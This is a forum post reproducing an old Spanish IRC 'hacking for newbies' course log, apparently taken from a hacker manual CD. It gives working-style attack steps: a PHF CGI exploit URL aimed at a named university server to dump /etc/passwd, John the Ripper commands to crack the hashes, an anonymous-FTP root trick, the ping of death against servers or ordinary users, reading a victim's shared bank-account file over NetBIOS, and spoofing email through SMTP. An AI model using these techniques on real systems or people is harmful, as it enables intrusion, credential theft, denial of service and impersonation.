Cuando lo tube yo todabía usaba windows 95 en un pentium 1 de 100MHz.
La caratula dice "MANUAL DE HACKERS" en letras amarillas grandes con las calaveras detras.
Bueno, el kurso que empezo el sabado (3 de Marzo), de iniziazion al hacking
para newbies, lo que kiere decir desde 0, salio satisfactoriamente.
Se zelebro en el IrC HiSpAnO, en el kanal #newbies, (key: hcurso). Llegamos
a ser 22 personas...
Se trataron de los siguientes temas:
Phf, ftp, Ping de la muerte, Recursos kompartidos, Fake e-mail kon el telnet,
Finger y whois (aunke en los dos ultimos a penas llegamos a entrar a fondo).
Esto es un nivel muy basiko asi que si ya pasaste esta etapa no pierdas el
tiempo...
Bueno empezamos por el Pfh...
Es un bug que tira en servidores que van por Unix. Abrimos el navegador y
ponemos la direccion:
http://www.dyit.edu.tw/Esta sera la direccion que utilizemos para probar.
El bug tiene dos varientas, esta:
/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
y esta otra:
/cgi-bin/nph-test-cgi?/*
Utilizando el primero, la direccion nos kedaria asi:
http://www.dyit.edu.tw/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwdUna vez que estamos dentro, nos saldra un txt, lo primero que hacemos es
guardarlo en el hd, y despues examinamos las lineas:
root:ryj54.DXH0sfg:0:1:system PRIVILEGED account:/:/bin/csh <--- La primera
linea del txt.
La primera palabra que vemos es root (superusuario, el uniko que puede krear
y borrar kuentas, etc...), esta es el login.
La segunda palabra es ryj54, este es el password.
Sin embargo si anilizamos la segunda linea observamos una variacion:
nobody:*Nologin:65534:65534:anonymous NFS user:/:
Es ese asterisco en el lugar donde deberia estar el pass.
Aki tenemos la lista de todos los usuarios de ese servidor y sus logins &
pass.
PREGUNTAS SOBRE EL PHF:
-Todas las paginas kontienen ese bug?
R> No solo las basadas en Unix, normalmente las de universidades...
-Como desencriptamos la contraseña?
R> Kon el Jhon the Ripper principalmente.
-Porke sale un asterisco en la segunda linea y no la pass?
R> Signifika que esta shadow y no se puede desencriptar por ese bug (phf).
-De donde bajamos el Jhon the Ripper?
R> vanhackez.islatortuga.com, iberhack.islatortuga.com,
underhack.islatortuga.com, etc...
-Komo se usa el Jhon the Ripper?
R> Para hacerlo de forma rapida esto:
c:\>john -single passwd (passwd es el nombre del archivo que hayamos kopiado
la lista, tiene que estar en *.txt)
Para hacerlo a la fuerza bruta:
c:\>john -i -rules -users:0 passwd
y si keremos usar diccionarios de esta forma:
c:\>john -wordfile:nombrediccionario -rules -users:0 passwd
-que kieres decir kon diccionarios listas de palabras?
R> Sip.
-Por lo que he oido hay tres formas de hacerse kon las pass: este bug,
ingenieria social y sniffers?
R> Sip, pero ahi mas, esta no suele funcionar mucho y se usa solo para
algunas kosas, yo pienso que las mas utilizada son los caballos de troya,
keylogs y la ingenieria social...
FTP:
Bueno utilizaremos el ftp que trae el ms-dos, para ellos nos vamos al prompt
y ponemos: c:\>ftp asi el prompt nos kambiara: ftp>
ahora ponemos: open victima.com
y nos dira: Conect to victima.com
220 victim.com FTP server ready.
pondremos: quoete user ftp
y nos dira: 331 Guest login ok, send ident as password.
y pondremos: quote cwd ~root
nos dira: 530 Please login with USER and PASS.
pondremos: quote pass ftp
nos dira: 230 Guest login ok, access restrictions apply.
y ya estamos dentro lo mas normal es que utilicemos un dir o lo que sea...
Este sistema es muy antiguo pero os puedo asegurar que sigue funcionando kon
muchos servidores que korren por Unix.
(Esta explikacion esta sakada de: "Improve the security of your site by
breaking into it")
PREGUNTAS SOBRE EL FTP:
No hubo fue demasiado fazil xDDDD
Ping de la Muerte.
Lo primero decir que utilizar esto es de lamers y segundo que se puede ir al
talego. Esta tecnica puede echar abajo a un servidor.
Todos konocemos la utilidad que tiene, se manda un ping y esperamos a las
respuesta del servidor para ver el lag que tenemos, pero que okurre?? que en el
ping que le mandamos a la victima al ser tan grande no puede respondernos y
se cae.
Para utilizarlo nos vamos al Ms-Dos y ponemos:
ping -65510 victima.com
PREGUNTAS SOBRE EL PING DE LA MUERTE:
-Sirve para tirar a un usuario normal?
R> Sip, solo tienes que kolokar en el lugar de victima.com su ip.
-Los pings de Linuz son mejores?
R> xDDDD NO COMMENT
-Alguna explicacion de porke a de ser -l 65510 y no otra cosa?
R> Es el tamaño del pakete.
-Pero dara lo mismo si el tamaño del pakete es mas grande, no?
R> No da lo mismo, los Unix's kaskan porke no soportan ese tamaño.
Recursos Compartidos.
Este se trata de entrar en los ordenadores de los demas, a traves de los
recursos kompartidos. Para ello debemos tener todas las aplikaciones de
NetBUIE y elementos kompartidos bien puestas.
1§ Mi PC / Panel De Control / Red ---> Aki tenemos que tener instalado el
protocolo NetBUIE y debajo donde pone Compartir archivos e impresoras,
dentro tenemos que tener las dos markadas.
§ Mi Pc / Acceso Telefoniko a redes / Tu servidor ---> Le das en el icono
al boton derecho y te vas a propiedas y tienes que tener activado NetBUIE y
Conectarse a la red. Kuando este todo puesto nos vamos al Ms-Dos y ponemos:
nbtstat -A ip
ahora debe salir esto:
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
VICTIMAMACHINE <00> UNIQUE Registered
VICTIMAGROUP <00> GROUP Registered
VICTIMAMACHINE <03> UNIQUE Registered
VICTIMAMACHINE <20> UNIQUE Registered
VICTIMAGROUP <1E> GROUP Registered
MAC Address = 44-45-53-54-00-00
Asi sabemos que el host del ekipo es VICTIMAMACHINE
Ahora tenemos que editar el archivo LMHOSTS, en el kaso de que hay un archivo
llamado LMHOSTS.sam no tokeis nada, si no lo hay hacer esto:
c:\>edit c:\windows\system32\LMHOSTS
VICTIMAMACHINE
y cerramos el editor.
(En el kaso del Windows Nt nos podemos saltar todo lo referente al LMHOSTS).
Ahora ponemos esto:
c:\>NBTSTAT -R
Y asi añadiremos el ordenata a nuesto Netbios.
Ahora keremos saber que komparte la victima asi que ponemos:
c:\>net view \\VICTIMAMACHINE
Y nos saldra:
Shared resources at \\VICTIMAMACHINE
Sharename Type Comment
-----------------------------------------
BANCO Disk
Komo podemos observar komparte una karpeta llamada Banco, y ahora ya lo
hazemos todo komo si fuese nuestro ordenador:
c:\> dir \\VICTIMAMACHINE\BANCO
c:\> type \\VICTIMAMACHINE\BANCO\CUENTABANCARIA.TXT
c:\>edit \\VICTIMAMACHINE\BANCO\CUENTABANCARIA.TXT
Y por ultimo si keremos añadir su ordenador por el windows pondremos:
c:\>NET USE e: \\MIPC\WINDOWS
PREGUNTAS SOBRE RECURSOS COMPARTIDOS:
-Pa poder konectar, tiene k tener un campo <20>?
R> Sip.
Fake e-mail
Bueno para esto abrimos el programa de telnet que trae el windows, konectamos
por el puerto 25 (smtp.
Una vez que estemos dentro del servidor que nos deje mandar e-mails pondremos:
mail from:television@española.es ->> asi nos hacemos pasar komo si fuesemos
la tele.
El servidor nos repondera:
250 <television@española.es> ... Sender Okay
ahora ponemos:
rcpt to:viernez13@usa.net <----- Pondremos nuestro e-mail para probar si
ese servidor no muestra nuestra ip en los enkabezados.
El servidor nos kontestara:
250 <
viernez13@usa.net> ... Recipiant Okay
Ahora pondremos: data
y el servidor nos dira: 354 Enter mail, end with "." on a line by itself
ahora escribimos:
To:
viernez13@usa.net From: television@española.es
Subject: Nuevo programa.
Bueno V|ErNeZ13, hemos abierto un nuevo programa de television que hablara
sobre los mejores hackers y para eso te necesitamos a ti.
TELEVISION ESPA¥OLA
S.A.
Para terminar poner "." (sin comillas).
El servidor nos contesta:
250 Mail accepted
Ahora escribimos:
quit <- ya esta todo listo
En el kanal probamos kon esta direccion de telnet: mail.airmail.net por el
puerto 25 lo que okurre es que kobra 5 dolares por kada mail que envies, asi que
buskate otro que sea gratuito que hay a patadas.
PREGUNTAS SOBRE FAKE E-MAIL
Ninguna...
FINGER Y WHOIS
Esto no llegamos a verlo del todo, solo hablamos de que valia para averiguar
datos sobre e-mails o direcciones de paginas webs. De momento esto es todo
de este tema.
OTRAS PREGUNTAS que HUBO:
-que es una kuenta shell?
R> Es una kuenta via telnet por la kual podemos ejecutar komandos de Unix.
Ya que salio esta pregunta nos pasamos unas kuantas kuentas shells y gracias
a alguien que no borro los logs nos xaparon una xDDDDDDD
Bueno esto a sido todo en la primera kedada por irC del KuRSo, para la
proxima semana estamos seguras de que aumentara mucho el nivel, asi poko a
poko.
Un saludo:
V|ErNeZ13
PD1: (Y saludar a toda las peña que fue... 8))
PD2: Mañana Domingo (3 de Marzo) hemos kedado a las seis en el kanal
#newbies, key: hcurso para entrar en el kanal: /join #newbies hcurso
Pasaros por alli...
Este solo era copy paste desde el irc pero el resto si eran ezines.
Autor
En línea
, también venia una ccarpeta llena de links de los cuales solo funcionaban dos el resto que eran mas de 100 no existía ninguno. Había una carpeta donde habían tools para cracking como el brute, the crack, jhon, addlf, etc y otras como el nat compilado en cygwin.
